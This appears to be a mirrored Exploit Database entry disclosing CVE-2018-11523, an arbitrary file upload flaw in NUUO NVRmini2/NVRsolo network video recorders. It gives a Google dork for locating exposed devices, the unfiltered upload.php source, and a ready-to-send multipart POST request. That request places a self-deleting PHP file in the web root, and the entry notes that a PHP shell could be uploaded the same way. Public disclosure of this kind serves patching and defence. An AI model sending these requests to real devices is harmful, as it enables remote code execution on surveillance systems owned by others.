NUUO NVRmini2 / NVRsolo – Arbitrary File Upload

• Exploit Database
• 108 阅读

• 作者： M3@Pandas
  日期： 2018-05-29
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/44794/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76

  # Exploit Title: NUUO NVRmini2 / NVRsolo Arbitrary File Upload Vulnerability # Google Dork: intitle:NUUO Network Video Recorder Login # Date: 2018-05-20 # Exploit Author: M3@Pandas # Vendor Homepage: http://www.nuuo.com # Software Link: N/A # Version: all # Tested on: PHP Linux # CVE : CVE-2018-11523   ========================== Advisory: NUUO NVRmini2 / NVRsolo Arbitrary File Upload Vulnerability Author: M3@pandas From DBAppSecurity Affected Version: All ========================== Vulnerability Description ==========================     Recetly, I found an Arbitrary File Upload Vulnerability in &apos;NUUO NVRmini2&apos; program, NVRmini2 is widely used all over the world.     Vulnerable cgi: /upload.php     <?php //echo $_FILES[&apos;userfile&apos;][&apos;type&apos;]; //echo ":"; //echo $_FILES[&apos;userfile&apos;][&apos;size&apos;]; //echo ":"; //echo urldecode($_FILES[&apos;userfile&apos;][&apos;name&apos;]); //echo ":"; //echo $_FILES[&apos;userfile&apos;][&apos;tmp_name&apos;]; //echo ":"; //echo $_FILES[&apos;userfile&apos;][&apos;error&apos;]; //echo ":"; echo $_FILES[&apos;userfile&apos;][&apos;name&apos;]; copy($_FILES["userfile"]["tmp_name"],$_FILES[&apos;userfile&apos;][&apos;name&apos;]); ?>         As the code above, no any filter, so we can upload a php shell directly to the web server.     ========================== POCEXP ==========================     1. Upload &apos;nuuonvr.php&apos; to web root path:   POST /upload.php HTTP/1.1 Host: 192.168.10.1 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: multipart/form-data; boundary=--------969849961 Content-Length: 162   ----------969849961 Content-Disposition: form-data; name="userfile"; filename="nuuonvr.php"   ?php phpinfo();@unlink(__FILE__);? ----------969849961--     2. Check if the php file is uploaded successfully: GET http://192.168.10.1/nuuonvr.php   If the page returns phpinfo info, target is vulnerable!